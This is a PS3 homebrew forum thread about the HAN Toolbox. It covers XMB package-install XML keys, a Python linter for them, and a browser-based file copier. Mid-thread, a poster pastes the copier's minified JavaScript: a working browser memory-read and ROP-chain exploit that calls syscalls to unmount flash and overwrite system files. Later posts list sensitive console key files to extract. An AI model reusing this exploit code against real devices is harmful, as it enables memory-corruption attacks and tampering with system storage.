HAN Toolbox

PS3 HAN Toolbox - The Xploit 3.0 Companion v0.7.1

Finally : nope, I never tested your suggestion. What I do know is that, if <Pair key="content_id"> is wrong or blank while content_id is present in the PARAM.SFO file, the PKG gets downloaded but install fails.
The reason why I was wondering if it is really needed is because usually homebrew PKGs don't use it in the SFO (at this point I don't remember any homebrew using it).

It seems the firmware downloads the PKG, and then it checks the CONTENT_ID before extracting the PKG contents (either from the PKG header, metadata, or from the SFO inside the PKG).
But this happens because the <Pair key="content_id"> is mentioned in the xml.
So the theory is... if we remove this line in the xml maybe we are disabling that check that happens immediately after the PKG is downloaded?

Dunno, the way you are doing it actually is fine because it is not problematic, but if it works without the CONTENT_ID it will be a bit more simple.

Those "pair keys" are always used together in OFW, but I'm not so sure if someone tried to remove a few of them; these ones are candidates to be removed imo (for tests trying to make it as simple as possible):
<Pair key="pkg_src_qa">, <Pair key="content_name">, <Pair key="content_id">

What does the <Pair key="content_name"><String>pkg_pc</String></Pair> do, btw?
Is that name pkg_pc visible somewhere? Is it related to some ID that was added to the PKG when it was built?
 
Content ID is taken from PKG header like you mentioned, PARAM.SFO doesn't even have an entry for content ID.
 
It is not usual for a homebrew to have an SFO with CONTENT_ID (written that way in uppercase), but they are using it in the HAN toolbox; download it from the link and take a look.

And as far as @ShaolinAssassin mentioned, the installation fails (after downloading it) if the CONTENT_ID doesn't exist in the PARAM.SFO, so in this case the firmware is reading it from the SFO (before installing it).
 
hmmm I stand corrected, I don't think I've seen it in an SFO file before.

It doesn't make sense that the PS3 checks it from the SFO though, that means after downloading the pkg the SFO is extracted (by itself) and checked, this is very unusual behaviour. It seems more logical that it would just check the header in the pkg.

Actually this may be what is happening at the end of the download, the PS3 kind of locks up before continuing with installation of the pkg. I guess during this time, the sfo is extracted & checked. Interesting.

@ShaolinAssassin What's the source of this net_package_install method? Do you know which file this was found in?

Edit: It can't be checked from SFO because I've made pkgs without CONTENT_ID inside of it, and they install fine.
 
Here are @DeViL303's notes about this download method: https://www.psx-place.com/threads/n...installing-packages-and-rare-xmb-items.13756/


And as far as @ShaolinAssassin mentioned, the installation fails (after downloading it) if the CONTENT_ID doesn't exist in the PARAM.SFO, so in this case the firmware is reading it from the SFO (before installing it).

You misread me I guess :) I said install fails if the <Pair key="content_id"> string from XML is wrong or blank - while CONTENT_ID exists in the PARAM.SFO. I did not test the situation you are referring to.
 
Here you can see all the known parameters allowed by PS3 SFO format
https://www.psdevwiki.com/ps3/PARAM.SFO

The CONTENT_ID and NP_COMMUNICATION_ID are never used in homebrew because they are usually related to the expiration time of the license and things like that.

The group of "pair keys" used in this query we are talking about was found in an old official firmware; I think it was the "folding at home", "live with playstation" or the "home" apps.
For these apps the CONTENT_ID was hardcoded in the xml with the goal of locking the download to that exact PKG.

What I'm saying is I have doubts whether that "locking" is mandatory or optional... in case it is optional we can simply delete the line in the xml (and not include the CONTENT_ID in the SFO) and forget about it.
 
Ok sorry, that detail is important to deduce how it is working :)

Anyway, the test that needs to be done is to delete the line in the xml (instead of blanking it or using a wrong name; those tests look more prone to fail).
If we are lucky and it is optional... I guess after that it doesn't matter if the PARAM.SFO has the CONTENT_ID.
 

Tested. Download is working fine, but install fails (error 8002AE04).

[Attached image: Sans-titre-1.png]

Code:
<XMBML version="1.0">

    <View id="package_link">
        <Attributes>
            <Table key="han_toolbox_update">
                <Pair key="icon"><String>http://raw.githubusercontent.com/ShaolinAssassin/HAN-Toolbox/master/update_status/v0.7.1-update.png</String></Pair>
                <Pair key="title"><String>Update Toolbox</String></Pair>
                <Pair key="info"><String>Download and install the latest Toolbox package and reboot after</String></Pair>
            </Table>
        </Attributes>
        <Items>
            <Query
                class="type:x-xmb/folder-pixmap"
                key="han_toolbox_update"
                attr="han_toolbox_update"
                src="#han_toolbox_update_main"
                />
        </Items>
    </View>

    <View id="han_toolbox_update_main">
        <Attributes>
            <Table key="han_toolbox_update_item">
                <Pair key="info"><String>net_package_install</String></Pair>
                <Pair key="pkg_src"><String>https://www.dropbox.com/s/pynd7rpp0upkmvv/NP0001-HANTOOLBX_00-0000111122223333.pkg_signed.pkg?dl=1</String></Pair>
                <Pair key="pkg_src_qa"><String>https://www.dropbox.com/s/pynd7rpp0upkmvv/NP0001-HANTOOLBX_00-0000111122223333.pkg_signed.pkg?dl=1</String></Pair>
                <Pair key="content_name"><String>pkg_pc</String></Pair>
                <Pair key="prod_pict_path"><String>/dev_hdd0/game/HANTOOLBX/USRDIR/IMAGES/download.png</String></Pair>
            </Table>
        </Attributes>
        <Items>
            <Item class="type:x-xmb/xmlnpsignup" key="han_toolbox_update_item" attr="han_toolbox_update_item"/>
        </Items>
    </View>
 
</XMBML>

*

Edit: other tests:
1) if the <Pair key="content_name"> string is missing, the download cannot even start;
2) its value doesn't matter. <Pair key="content_name"><String>Hello world</String></Pair> worked fine and did not make any visible change: I could download and install the PKG.
3) but it can't be blank, otherwise the download doesn't start.
 
Ok, sorry for rushing; after reading the other thread I remember @DeViL303 was trying to remove those 2 lines in the xml for the "pkg_src_qa" and the "content_id" to simplify it, and I was involved in those talks, but no success with them :/
Never mind, it was just a detail without much importance.

Btw, now that you posted a screenshot of the SFO editor, I guess the values of SOUND_FORMAT and the RESOLUTION could be replaced by zeroes too.
The PKG is not going to boot (because it uses BOOTABLE = 0), so they are not doing anything useful.

--------------
Sorry again for mentioning the <Pair key="content_name">... after reading the other thread I realized it is loading a text string from inside the rco, the kind of strings that officially start with the prefix "msg"
Like... "msg_my_text"
It confused me a bit because DeViL303 didn't start the names of the custom strings like that, but it doesn't matter :)
 
Missed all this. I can explain some.

Removing the content ID entry from the xml completely will even allow all file types to download fully; I have done lots of testing on this method too. I think they might get deleted too at 100%. Can't remember now.

That field must be there though; every package has a long content ID, regardless of whether the field is in the param.sfo, and that long content ID must match the xml if you want a successful install. I never found a way around that.

Content name is what shows up as the title on the XMB when you install the package. I added something there just so that we could add an entry to the rco sometime, like "download now" or something. At the moment there is no title for the actual item, and that is why we must do the extra sub menu. The issue is, that entry will only work from an RCO; ideally we could add the title of the package there and make all xmls much simpler. Actually, I had the first Demo downloader written like that. All titles were in the rco. I discovered that if this field exists, but is not in the RCO, then the pkg name gets shown during download progress.

I started adding the long content ID to my packages because, years ago, I needed it at one stage to install over another package without error; it might have been XMBMANPLS gamedata, not sure. To avoid this issue in future I just always added it from then on. I added it in the normal way with a params.sfo editor, and it works. So I doubt the order has any effect.
@ShaolinAssassin What's the source of this net_package_install method? Do you know which file this was found in?
It has never been used in OFW as far as I know. :) I was looking through an sprx, and found "home_install" or something, but I knew about that, and I knew that required you to be logged into PSN to work. Next to it in the sprx was "net_package_install", so I tried it and it worked.
 
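The pair-key behaviour reported by the posters above (content_name must be present and non-blank, content_id must match the package's long content ID) can be checked before an XML is published. This is an added example, not code from any poster or from the HAN Toolbox project; the header offset 0x30 for the 36-character content ID, the table keys and the example.invalid URL are assumptions, and the sample header and XML are constructed.

```python
import xml.etree.ElementTree as ET

PKG_MAGIC = b"\x7fPKG"
# Assumption (not stated in the thread): the long content ID is a 36-byte
# ASCII field at offset 0x30 of the PKG header.
CONTENT_ID_OFFSET = 0x30
CONTENT_ID_LENGTH = 0x24


def pkg_content_id(header: bytes) -> str:
    """Read the long content ID from the first bytes of a PKG file."""
    if header[:4] != PKG_MAGIC:
        raise ValueError("not a PKG header (bad magic)")
    end = CONTENT_ID_OFFSET + CONTENT_ID_LENGTH
    if len(header) < end:
        raise ValueError("PKG header truncated before content ID")
    return header[CONTENT_ID_OFFSET:end].rstrip(b"\x00").decode("ascii")


def install_tables(xmbml: str) -> dict:
    """Map table key -> {pair key: string} for net_package_install tables."""
    tables = {}
    for table in ET.fromstring(xmbml).iter("Table"):
        pairs = {}
        for pair in table.findall("Pair"):
            string = pair.find("String")
            pairs[pair.get("key")] = (string.text or "") if string is not None else ""
        if pairs.get("info") == "net_package_install":
            tables[table.get("key")] = pairs
    return tables


def lint(xmbml: str, pkg_header: bytes) -> list:
    """Return (table, pair, outcome) for each rule reported in the thread."""
    expected = pkg_content_id(pkg_header)
    findings = []
    for key, pairs in install_tables(xmbml).items():
        # Reported: missing or blank content_name, download does not start.
        if not pairs.get("content_name"):
            findings.append((key, "content_name", "download does not start"))
        # Reported: missing, blank or wrong content_id, download completes
        # but the install fails.
        declared = pairs.get("content_id")
        if declared is None:
            findings.append((key, "content_id", "missing: install fails"))
        elif declared != expected:
            findings.append((key, "content_id", "does not match PKG header: install fails"))
    return findings


# Constructed sample data: a header holding only the magic and the content ID
# (taken from the PKG file name posted in the thread), and four test tables.
SAMPLE_CID = "NP0001-HANTOOLBX_00-0000111122223333"
SAMPLE_HEADER = (PKG_MAGIC + bytes(CONTENT_ID_OFFSET - 4)
                 + SAMPLE_CID.encode("ascii") + bytes(12))
SAMPLE_XMBML = """<XMBML version="1.0">
  <View id="demo"><Attributes>
    <Table key="ok">
      <Pair key="info"><String>net_package_install</String></Pair>
      <Pair key="pkg_src"><String>https://example.invalid/demo.pkg</String></Pair>
      <Pair key="content_name"><String>pkg_pc</String></Pair>
      <Pair key="content_id"><String>NP0001-HANTOOLBX_00-0000111122223333</String></Pair>
    </Table>
    <Table key="no_id">
      <Pair key="info"><String>net_package_install</String></Pair>
      <Pair key="content_name"><String>pkg_pc</String></Pair>
    </Table>
    <Table key="blank_name">
      <Pair key="info"><String>net_package_install</String></Pair>
      <Pair key="content_name"><String></String></Pair>
      <Pair key="content_id"><String>NP0001-HANTOOLBX_00-0000111122223333</String></Pair>
    </Table>
    <Table key="wrong_id">
      <Pair key="info"><String>net_package_install</String></Pair>
      <Pair key="content_name"><String>Hello world</String></Pair>
      <Pair key="content_id"><String>NP0001-OTHERTITL_00-0000000000000000</String></Pair>
    </Table>
  </Attributes></View>
</XMBML>"""

if __name__ == "__main__":
    for table, pair, outcome in lint(SAMPLE_XMBML, SAMPLE_HEADER):
        print(f"{table}: {pair}: {outcome}")
```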
Hey guys, I've made some improvements to the awful file copier:

- Removed a lot of useless code
- Removed the device selection boxes as they were wasted space
- Changed exploit search base & size offsets
- Reduced search loop delay, initialization is much faster
- Removed the ability to reboot after copying, another useless feature that was wasting space

It now works much better, has a higher success rate, and is faster. You can even copy multiple files without even leaving the browser now! Still 4.84 only BTW.
 

@lmn7 IIRC You also have a simple file copier with 2 parameters (source & destination files).

I have this idea: It would be nice for HAN & CFW users to have an XMB menu (organized by source folders) with the most frequently copied files already created + the copier above (for custom copy). Also the PKG Linker could be used to create a dynamic xml with the files to be copied.

@DeViL303 @ShaolinAssassin @pink1 What do you think?
 
d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function 
trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){showResult(progress_msg_frag1+((100/max_loops)*total_loops).toString()+progress_msg_frag2);t_out=setTimeout(initROP,500,false)}else{total_loops=0;showResult(fail_msg_frag);t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return 
hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initROP(a){try{init_run(a,0x80200000,5/2*mbytes,0*mbytes,0*mbytes);var 
b=0x8B200000;template_1_file_usb=document.getElementById("srcfile").value;template_1_file_blind=document.getElementById("desfile").value;xtra_data=flash_partition.convert()+filesystem.convert()+mount_path.convert()+template_1_file_usb.convert()+fill_by_4bytes(0xC,dbyte00)+template_1_file_blind.convert()+fill_by_4bytes(0xC,dbyte00)+fill_by_16bytes(0x70,dbyte00)+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}flash_partition_addr=xtra_data_addr;fs_addr=flash_partition_addr+flash_partition.convertedSize()-0x4;mount_path_addr=fs_addr+filesystem.convertedSize();template_1_file_usb_addr=mount_path_addr+mount_path.convertedSize();template_1_file_usbfd_addr=template_1_file_usb_addr+template_1_file_usb.convertedSize();template_1_file_usb_readlen_addr=template_1_file_usbfd_addr+word_size;template_1_file_blind_addr=template_1_file_usb_readlen_addr+dword_size;template_1_file_blindfd_addr=template_1_file_blind_addr+template_1_file_blind.convertedSize();template_1_file_blind_writelen_addr=template_1_file_blindfd_addr+word_size;store_idx_arr1[0]=(template_1_file_blind_writelen_addr-flash_partition_addr+0x8)/2;null_addr=template_1_file_blind_writelen_addr+dword_size;store_idx_arr2[0]=(null_addr-flash_partition_addr+0xC)/2;stat_addr=null_addr+dword_size*0x3;stack_frame=stack_frame_hookup()+syscall(sc_fs_umount,flash_partition_addr,fs_addr,mount_path_addr,0,0,0,0,0)+copy_file_overwrite(template_1_file_usb_addr,template_1_file_blind_addr,template_1_file_usbfd_addr,template_1_file_blindfd_addr,b,template_1_file_usb_readlen_addr,template_1_file_blind_writelen_addr,stat_addr,null_addr,null_addr+0x8)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_
ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var c=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var d=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var f=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((d===jump_2)&&(f===jump_1)&&(x===xtra_data)&&(c===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit_1val,2000,"\74br\76\74h1\76\74b\76\74span style=\47color:green\47\76File copied successfully!\74/h1\76\74/span\76","\74br\76\74h1\76\74b\76\74span style=\47color:red\47\76File copy failed!\74/h1\76\74/span\76","");t_out=0;total_loops=0}');

Good work, is there a path length limit? I need to copy iso.bin.enc from the game directory, from slus51234, from usrdir, but I couldn't type the whole path in the textbox.


 
Good work, is there a path length limit? I need to copy iso.bin.enc from the game directory, from slus51234, from usrdir, but I couldn't type the whole path in the textbox.


This is a standard glitch with the browser's on-screen keyboard as far as I know. I get this issue just entering a normal web address sometimes. You need to add it in parts if it decides to do that. So add up as far as it lets you, enter it, then press X again to edit it and it will let you add more.
 
@lmn7 IIRC you also have a simple file copier with 2 parameters (source & destination files).

I have this idea: It would be nice for HAN & CFW users to have an XMB menu (organized by source folders) with the most frequently copied files already created + the copier above (for custom copy). Also the PKG Linker could be used to create a dynamic xml with the files to be copied.

@DeViL303 @ShaolinAssassin @pink1 What do you think?

Do we need this? I mean, @lmn7's method here is much faster/easier for copying files to HDD.

TBH, I think I only used the file copier once - just to test it. Which files are most frequently copied from HDD to USB?
 
I'm not sure either, it's a nice idea if someone wants to do it. But we do already have almost every file in the firmware in drop-down menus on the exploit pages, so those are kind of covered. I know icons for every one could be done too and would be quicker maybe, not sure as you have to scroll a list either on the XMB or on the webpage.

It might be easier to make a webpage with all the injectors on it than to make an icon for each file on the XMB.

See the pics, maybe all these could be combined somehow with different buttons for file type or something. IDK.

EDIT: I suppose that is not offline though.
 

Attachments: upload_2019-4-16_16-56-32.png, upload_2019-4-16_16-58-1.png, upload_2019-4-16_16-58-52.png
Do we need this? I mean, @lmn7's method here is much faster/easier for copying files to HDD.

TBH, I think I only used the file copier once - just to test it. Which files are most frequently copied from HDD to USB?

Yes, the new PKG maker by lmn7 is faster and more convenient for copying to HDD / dev_blind.

The idea is more to extract files from the system directly from XMB.

I'm not sure either, it's a nice idea if someone wants to do it. But we do already have almost every file in the firmware in drop-down menus on the exploit pages, so those are kind of covered. I know icons for every one could be done too and would be quicker maybe, not sure as you have to scroll a list either on the XMB or on the webpage.

It might be easier to make a webpage with all the injectors on it than to make an icon for each file on the XMB.

See the pics, maybe all these could be combined somehow with different buttons for file type or something. IDK.

EDIT: I suppose that is not offline though.

Yes, the online copier is convenient. I mean using the offline copiers directly from XMB. Also not all, only the more frequent files (e.g. xRegistry.sys, category_game.xml, act.dat, eid_root_key, coldboot.raf, etc.)

The idea is to extend it to be able to generate dynamic XML via PKG Linker or maybe with wMM, so we can copy files to USB easily like we do with pictures/music/videos without having to open a web page (e.g. webman's File Manager or the online file copier). But it could also be used to copy files from USB as an alternative to the custom PKG Maker of lmn7.

Well it was just an idea... anyway I always use FTP directly from Windows Explorer when I need to copy files :-p
 
I see more now. I misread and thought you meant recreate the entire structure of flash on the XMB. Having some offline versions for the most common files makes much more sense.

For CFW, it's a shame we can't go one step further and create an rco for the extended xai_plugin, an rco that would give us the device/path options when required in conjunction with the sprx. We could maybe have a full XMB file manager then, with dynamically created xmls based on existing files on hdd/flash/usb, and then you press X on them and get a pop-up like download_plugin does with existing devices. Probably not hard if we knew how. :)

NTFS and zip support added to xai would be great too but that's off topic. :)
 
Good work, is there a path length limit? I need to copy iso.bin.enc from the game directory, from slus51234, from usrdir, but I couldn't type the whole path in the textbox.


You could do that with the first version of the file copier, but Sony has implemented some stupid character restriction when first entering text. No idea why they thought that was a good idea, but it has nothing to do with me.

You can't copy larger files with the file copier either, as it copies the entire file contents into memory... seriously, there's no standard file copy syscall (that I know of) that allows you to copy files between devices. Blame Sony for everything.

BTW Now that you have been modding download_plugin, I wonder if you could look if filecopy_plugin or maybe data_copy_plugin could be hacked to copy other file types (e.g. like .iso or .pkg).
On the wiki someone documented the arguments that are passed to those plugins, I don't really understand it but you can have a look and see if you can figure it out. Another issue is, how can we pass multiple arguments through module_action? I've tried using spaces to separate the parameters, but that doesn't seem to work.
 
